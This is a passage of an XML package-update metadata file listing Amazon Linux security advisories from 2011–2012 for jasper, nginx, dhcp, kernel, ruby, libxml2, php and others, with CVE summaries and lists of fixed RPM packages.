arch="i686"><filename>Packages/krb5-debuginfo-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="22.20.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.9-22.20.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.9-22.20.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="22.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.9-22.20.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-29</id><title>Amazon Linux - ALAS-2011-29: important priority package update for jasper</title><issued date="2011-12-12 13:45:00" /><updated date="2014-09-14 15:07:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4516:
Two heap-based buffer overflow flaws were found in the way JasPer decoded JPEG 2000 compressed image files. An attacker could create a malicious JPEG 2000 compressed image file that, when opened, would cause applications that use JasPer (such as Nautilus) to crash or, potentially, execute arbitrary code.
Two heap-based buffer overflow flaws were found in the embedded JasPer library, which is used to provide support for Part 1 of the JPEG 2000 image compression standard in the jpeg2ktopam and pamtojpeg2k tools. An attacker could create a malicious JPEG 2000 compressed image file that could cause jpeg2ktopam to crash or, potentially, execute arbitrary code with the privileges of the user running jpeg2ktopam. These flaws do not affect pamtojpeg2k.
Heap-based buffer overflow in the jpc_cox_getcompparms function in libjasper/jpc/jpc_cs.c in JasPer 1.900.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted numrlvls value in a JPEG2000 file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4516" title="" id="CVE-2011-4516" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1807.html" title="" id="RHSA-2011:1807" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="jasper-debuginfo" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="15.5.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-15.5.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-15.5.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="15.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-15.5.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-30</id><title>Amazon Linux - ALAS-2011-30: medium priority package update for nginx</title><issued date="2011-12-13 12:50:00" /><updated date="2014-09-14 15:08:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4315:
Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4315" title="" id="CVE-2011-4315" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nginx-debuginfo" version="0.8.54" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-debuginfo-0.8.54-1.4.amzn1.i686.rpm</filename></package><package name="nginx" version="0.8.54" release="1.4.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-0.8.54-1.4.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="0.8.54" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-debuginfo-0.8.54-1.4.amzn1.x86_64.rpm</filename></package><package name="nginx" version="0.8.54" release="1.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-0.8.54-1.4.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-31</id><title>Amazon Linux - ALAS-2012-31: medium priority package update for dhcp</title><issued date="2012-01-05 20:58:00" /><updated date="2014-09-14 15:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4539:
dhcpd in ISC DHCP 4.x before 4.2.3-P1 and 4.1-ESV before 4.1-ESV-R4 does not properly handle regular expressions in dhcpd.conf, which allows remote attackers to cause a denial of service (daemon crash) via a crafted request packet.
A denial of service flaw was found in the way the dhcpd daemon handled DHCP request packets when regular expression matching was used in "/etc/dhcp/dhcpd.conf". A remote attacker could use this flaw to crash dhcpd.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4539" title="" id="CVE-2011-4539" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1819.html" title="" id="RHSA-2011:1819" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="dhcp-devel" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-devel-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhclient" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhclient-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-debuginfo-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="i686"><filename>Packages/dhcp-common-4.1.1-25.P1.14.amzn1.i686.rpm</filename></package><package name="dhcp" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhclient" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhclient-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhcp-devel" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-devel-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhcp-common" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-common-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package><package name="dhcp-debuginfo" version="4.1.1" release="25.P1.14.amzn1" epoch="12" arch="x86_64"><filename>Packages/dhcp-debuginfo-4.1.1-25.P1.14.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-32</id><title>Amazon Linux - ALAS-2012-32: medium priority package update for cacti</title><issued date="2012-01-05 20:59:00" /><updated date="2014-09-14 15:34:00" /><severity>medium</severity><description /><references /><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="cacti" version="0.8.7i" release="2.3.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.7i-2.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-33</id><title>Amazon Linux - ALAS-2012-33: medium priority package update for icu</title><issued date="2012-01-09 09:18:00" /><updated date="2014-09-14 15:10:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4599:
A stack-based buffer overflow flaw was found in the way ICU performed variant canonicalization for some locale identifiers. If a specially-crafted locale representation was opened in an application linked against ICU, it could cause the application to crash or, possibly, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4599" title="" id="CVE-2011-4599" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1815.html" title="" id="RHSA-2011:1815" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libicu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="icu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/icu-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="libicu-devel" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/libicu-devel-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="icu-debuginfo" version="4.2.1" release="9.9.amzn1" epoch="0" arch="i686"><filename>Packages/icu-debuginfo-4.2.1-9.9.amzn1.i686.rpm</filename></package><package name="icu-debuginfo" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-debuginfo-4.2.1-9.9.amzn1.x86_64.rpm</filename></package><package name="libicu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-4.2.1-9.9.amzn1.x86_64.rpm</filename></package><package name="libicu-doc" version="4.2.1" release="9.9.amzn1" epoch="0" arch="noarch"><filename>Packages/libicu-doc-4.2.1-9.9.amzn1.noarch.rpm</filename></package><package name="libicu-devel" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/libicu-devel-4.2.1-9.9.amzn1.x86_64.rpm</filename></package><package name="icu" version="4.2.1" release="9.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/icu-4.2.1-9.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-34</id><title>Amazon Linux - ALAS-2012-34: medium priority package update for kernel</title><issued date="2012-01-06 10:19:00" /><updated date="2014-09-14 15:11:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4127:
In KVM (Kernel-based Virtual Machine) environments using raw format virtio disks backed by a partition or LVM volume, a privileged guest user could bypass intended restrictions and issue read and write requests (and other SCSI commands) on the host, and possibly access the data of other guests that reside on the same underlying block device. Partition-based and LVM-based storage pools are not used by default. Refer to Red Hat Bugzilla bug 752375 for further details and a mitigation script for users who cannot apply this update immediately.
* Using the SG_IO ioctl to issue SCSI requests to partitions or LVM volumes resulted in the requests being passed to the underlying block device. If a privileged user only had access to a single partition or LVM volume, they could use this flaw to bypass those restrictions and gain read and write access (and be able to issue other SCSI commands) to the entire block device. Refer to Red Hat Knowledgebase article DOC-67874, linked to in the References, for further details about this issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4127" title="" id="CVE-2011-4127" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-106.53.amzn1.noarch.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-106.53.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="106.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-106.53.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-35</id><title>Amazon Linux - ALAS-2012-35: important priority package update for ruby</title><issued date="2012-01-19 20:02:00" /><updated date="2014-09-14 15:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4815:
Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
A denial of service flaw was found in the implementation of associative arrays (hashes) in Ruby. An attacker able to supply a large number of inputs to a Ruby application (such as HTTP POST request parameters sent to a web application) that are used as keys when inserting data into an array could trigger multiple hash function collisions, making array operations take an excessive amount of CPU time. To mitigate this issue, randomization has been added to the hash function to reduce the chance of an attacker successfully causing intentional collisions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4815" title="" id="CVE-2011-4815" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ruby" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-libs" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-ri" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.357-1.10.amzn1.i686.rpm</filename></package><package name="ruby-irb" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.357-1.10.amzn1.noarch.rpm</filename></package><package name="ruby-devel" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.357-1.10.amzn1.noarch.rpm</filename></package><package name="ruby-ri" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-libs" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.357" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.357-1.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-36</id><title>Amazon Linux - ALAS-2012-36: important priority package update for libxml2</title><issued date="2012-01-19 20:08:00" /><updated date="2014-09-14 15:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3919:
Heap-based buffer overflow in libxml2, as used in Google Chrome before 16.0.912.75, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
A heap-based buffer overflow flaw was found in the way libxml2 decoded entity references with long names. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
CVE-2011-3905:
libxml2, as used in Google Chrome before 16.0.912.63, allows remote attackers to cause a denial of service (out-of-bounds read) via unspecified vectors.
An out-of-bounds memory read flaw was found in libxml2. A remote attacker could provide a specially-crafted XML file that, when opened in an application linked against libxml2, would cause the application to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3905" title="" id="CVE-2011-3905" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3919" title="" id="CVE-2011-3919" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0018.html" title="" id="RHSA-2012:0018" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="libxml2-devel" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-devel-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-static-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-debuginfo-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2-python" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-python-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.11.amzn1" epoch="0" arch="i686"><filename>Packages/libxml2-2.7.6-4.11.amzn1.i686.rpm</filename></package><package name="libxml2" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-python" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-python-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-devel" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-devel-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-debuginfo" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-debuginfo-2.7.6-4.11.amzn1.x86_64.rpm</filename></package><package name="libxml2-static" version="2.7.6" release="4.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libxml2-static-2.7.6-4.11.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-37</id><title>Amazon Linux - ALAS-2012-37: medium priority package update for php</title><issued date="2012-01-19 20:10:00" /><updated date="2014-09-14 15:13:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4885:
PHP before 5.3.9 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
It was found that the hashing routine used by PHP arrays was susceptible to predictable hash collisions. If an HTTP POST request to a PHP application contained many parameters whose names map to the same hash value, a large amount of CPU time would be consumed. This flaw has been mitigated by adding a new configuration directive, max_input_vars, that limits the maximum number of parameters processed per request. By default, max_input_vars is set to 1000.
CVE-2011-4566:
Integer overflow in the exif_process_IFD_TAG function in exif.c in the exif extension in PHP 5.4.0beta2 on 32-bit platforms allows remote attackers to read the contents of arbitrary memory locations or cause a denial of service via a crafted offset_val value in an EXIF header in a JPEG file, a different vulnerability than CVE-2011-0708.
An integer overflow flaw was found in the PHP exif extension. On 32-bit systems, a specially-crafted image file could cause the PHP interpreter to crash or disclose portions of its memory when a PHP script tries to extract Exchangeable image file format (Exif) metadata from the image file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4566" title="" id="CVE-2011-4566" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4885" title="" id="CVE-2011-4885" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0019.html" title="" id="RHSA-2012:0019" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-dba" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-embedded-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.9" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.9-1.9.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.9" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pgsql-5.3.9-1.9.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" 